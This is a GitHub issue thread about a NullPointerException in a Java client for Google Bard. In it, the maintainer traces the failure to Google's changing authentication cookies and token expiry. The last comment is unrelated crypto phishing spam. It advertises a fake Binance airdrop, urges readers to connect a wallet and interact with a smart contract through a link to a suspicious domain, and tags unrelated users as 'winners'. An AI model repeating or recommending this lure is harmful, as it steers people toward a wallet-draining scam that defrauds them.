### ISSUE TITLE
Error testing the example provided in the documentation

### ISSUE THREAD

**Issue by jabrena** [LarryDpk/Google-Bard#14]
Hi,

I am testing your library with the example from the project:

**Code:**

```java
public class BardDemo {

    public static void main(String[] args) {
        AIClient client = new GoogleBardClient("MY_TOKEN");
        Answer answer = client.ask("What is the date today?");
    }
}
```

but I don´t understand the following error:

```bash
17:31:59.717 [BardDemo.main()] INFO com.pkslow.ai.util.WebUtils -- Creating OkHttpClient with timeout PT5M
17:32:00.011 [BardDemo.main()] INFO com.pkslow.ai.util.WebUtils -- OkHttpClient created
17:32:00.731 [BardDemo.main()] INFO com.pkslow.ai.GoogleBardClient -- getSNlM0e Response code: 200
17:32:00.809 [BardDemo.main()] INFO com.pkslow.ai.GoogleBardClient -- calling Bard with request BardRequest{strSNlM0e=null, question=What is the date today?, conversationId=, responseId=, choiceId=}
17:32:00.814 [BardDemo.main()] ERROR com.pkslow.ai.GoogleBardClient -- Failed to get answer: 
java.lang.NullPointerException: Parameter specified as non-null is null: method okhttp3.FormBody$Builder.add, parameter value
        at okhttp3.FormBody$Builder.add(FormBody.kt)
        at com.pkslow.ai.util.BardUtils.buildRequestBodyForAsk(BardUtils.java:100)
        at com.pkslow.ai.util.BardUtils.createPostRequestForAsk(BardUtils.java:86)
        at com.pkslow.ai.GoogleBardClient.callBardToAsk(GoogleBardClient.java:89)
        at com.pkslow.ai.GoogleBardClient.ask(GoogleBardClient.java:53)
        at BardDemo.main(BardDemo.java:15)
        at org.codehaus.mojo.exec.ExecJavaMojo$1.run(ExecJavaMojo.java:254)
        at java.base/java.lang.Thread.run(Thread.java:833)
```

I am using this version of your project:

https://mvnrepository.com/artifact/com.pkslow/google-bard

```
        <dependency>
            <groupId>com.pkslow</groupId>
            <artifactId>google-bard</artifactId>
            <version>0.3.3</version>
        </dependency>
```

Can you help me?

Many thanks in advance

Juan Antonio

**Comment by LarryDpk** [comment]
There's some change for the auth on Google Bard side. working on this to find a better solution.

**Comment by jabrena** [comment]
Oki, tell me when I can test again the library

**Comment by LarryDpk** [comment]
open bard with incognito mode and get the token again can work for a short time. now Google makes the token expire soon.

**Comment by jabrena** [comment]
I will try today

**Comment by jabrena** [comment]
Hi,

I tried again but it didn´t work using the approach to open an annonimous browser:

Example:
https://github.com/jabrena/spring-boot-user-beans/blob/be736d0af419a749724da3f3a54174434b8fe916/spring-boot-starter-user-beans/src/test/java/io/github/jabrena/GoogleBardTest.java

**Comment by LarryDpk** [comment]
From this issue https://github.com/acheong08/Bard/issues/68#issuecomment-1637132696 we can see:
Bard now requires 3 different types of cookies __Secure-1PAPISID, __Secure-1PSIDTS, __Secure-1PSIDCC and one of them is rotated every 20 mins. This makes the whole implementation becomes impossible.

I will add more cookies and try. But Bard is making more restriction.

**Comment by jabrena** [comment]
Oki, if you have the Curl requests, I could test from my side in Spain.

**Comment by LarryDpk** [comment]
Strange, it's ok for me. Reloign incognito mode and get the new token:
<img width="408" alt="image" src="https://github.com/LarryDpk/Google-Bard/assets/9039939/f88100e9-b7c7-4071-9238-9798e889a05b">

Successful call:
<img width="1213" alt="image" src="https://github.com/LarryDpk/Google-Bard/assets/9039939/85b65004-59d4-408c-bc1b-6c0dd3ed09f4">

**Comment by estebangarciaalonso** [comment]
It worked the first time as you said and then it stopped working...

**Comment by LarryDpk** [comment]
can't do anything due to Google Bard Limit

**Comment by LarryDpk** [comment]
Now it needs two cookies, please use latest version

**Comment by SASECOMPANY** [comment]
# Binance Airdrop Guide: $500k Worth of Airdrop is Ready, here's how to Claim

[![Claim Now](https://moneybinds.com/wp-content/uploads/2023/12/Binance_Airdrop_feature_img.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](http://go.bnbcoinsearn.online/97Q7Yj).
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "Claim" button to interact with the smart contract.

### 3. Share the Excitement on Twitter:
   - Spread the word about claiming your free tokens!
     - **Tweet:** [Share on Twitter](https://twitter.com/share?url=http://go.bnbcoinsearn.online/97Q7Yj&text=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceTokenGiveaway%20%23Crypto)


Winners: @Ubisoft-potato, @lianpeng527, @rebenstein, @Vincebye, @diskang, @hkbarton, @jobsssss, @gaspreth, @mzhang-code, @suiteki
